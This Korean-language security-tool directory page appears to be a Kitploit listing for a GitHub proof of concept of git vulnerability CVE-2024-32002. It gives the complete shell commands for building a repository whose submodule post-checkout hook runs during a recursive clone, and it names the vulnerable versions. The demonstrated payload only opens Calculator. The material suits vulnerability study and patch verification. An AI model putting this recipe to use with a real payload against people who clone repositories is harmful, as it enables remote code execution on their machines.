Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-32002 — git 취약점 CVE-2024-32002에 대한 개념 증명 | Kitploit
도구/GitHubGitHub/markuta/cve-2024-32002
Vulnerability AnalysisExploitationSupply Chain SecurityLearning & EducationPayload Development
GitHubmarkuta/cve-2024-32002

CVE-2024-32002

git 취약점 CVE-2024-32002에 대한 개념 증명

저장소 보기
212년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-32002

계산기를 실행하는 간단한 개념 증명(PoC)입니다(macOS 예시만 해당). git clone --recursive 명령을 사용하면 이 저장소는 https://github.com/markuta/hooky 도 함께 내려받으며, 해당 저장소에는 post-checkout 스크립트가 포함되어 있습니다. 대부분 t7406-submodule-update.sh 파일의 커밋 수정을 기반으로 합니다.

실행

참고: 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, 2.39.4 이전 버전은 취약합니다.

root@kitploit:~
git clone --recursive github.com/markuta/CVE-2024-32002

나만의 저장소 만들기

root@kitploit:~
# 서브모듈 저장소(페이로드)
git init hooky
cd hooky
mkdir -p y/hooks 
echo "open -a Calculator.app" > y/hooks/post-checkout
chmod +x y/hooks/post-checkout
git add y/hooks/post-checkout
git commit -m post-checkout
hook_repo_path="$(pwd)"

# 메인 저장소
git init captain
git submodule add --name x/y "$hook_repo_path" A/modules/x
git commit -m add-submodule
printf .git >dotgit.txt
git hash-object -w --stdin <dotgit.txt >dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" >index.info
git update-index --index-info <index.info
git commit -m add-symlink

추가 정보

취약점에 대한 자세한 내용은 여기와 여기에서 확인할 수 있습니다.

도구 다운로드